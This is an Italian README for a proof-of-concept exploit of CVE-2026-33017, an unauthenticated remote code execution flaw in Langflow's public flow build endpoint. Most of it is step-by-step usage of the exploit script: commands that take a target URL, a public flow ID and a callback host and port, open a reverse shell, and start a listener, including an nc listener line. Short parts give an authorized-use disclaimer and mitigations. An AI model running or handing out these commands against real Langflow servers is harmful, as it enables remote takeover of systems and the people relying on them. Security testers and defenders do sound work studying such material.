
CVE-2026-33017 PoC RCE Langflow
PoC per la falla di esecuzione di codice non autenticata build_public_tmp in Langflow.
Carica un componente dannoso in un flusso pubblico, attiva una build e cattura una reverse shell.
Solo per test di sicurezza autorizzati. Utilizza esclusivamente su sistemi che possiedi o per i quali hai esplicita autorizzazione al test.
requests (pip install requests)Avvia il listener integrato e lancia l'exploit in un colpo solo:
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
Quando la shell si connette, tenta automaticamente di effettuare l'upgrade a una shell completamente interattiva.
Se preferisci usare il tuo listener (es. nc -lvnp 4444), rimuovi --listen:
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444
| Flag | Descrizione |
|---|---|
--url | URL del server Langflow di destinazione (obbligatorio) |
--flow-id | UUID del flusso pubblico condiviso (obbligatorio) |
--lhost | IP per il callback della reverse shell (obbligatorio) |
--lport | Porta per il callback della reverse shell (obbligatorio) |
--listen | Avvia il listener integrato |
--timeout | Timeout delle richieste HTTP in secondi (di default 30) |
-k, --insecure | Disabilita la verifica dei certificati TLS (certificati self-signed / scaduti) |
--no-upgrade | Salta l'upgrade automatico a TTY, usa una shell a riga di comando di base |
CVE-2026-33017 è una RCE non autenticata nell'endpoint POST /api/v1/build_public_tmp/{flow_id}/flow di Langflow, che esegue Python fornito dall'attaccante dalle definizioni dei nodi del flusso senza sandbox. Per saperne di più consulta le risorse seguenti:
Mitigazioni tratte dal report di Sysdig Threat Research:
/api/v1/build_public_tmp o disabilita completamente la creazione di flussi pubblici.Questo strumento è fornito per ricerca e test di penetrazione autorizzati. L'autore non si assume alcuna responsabilità per usi impropri o danni.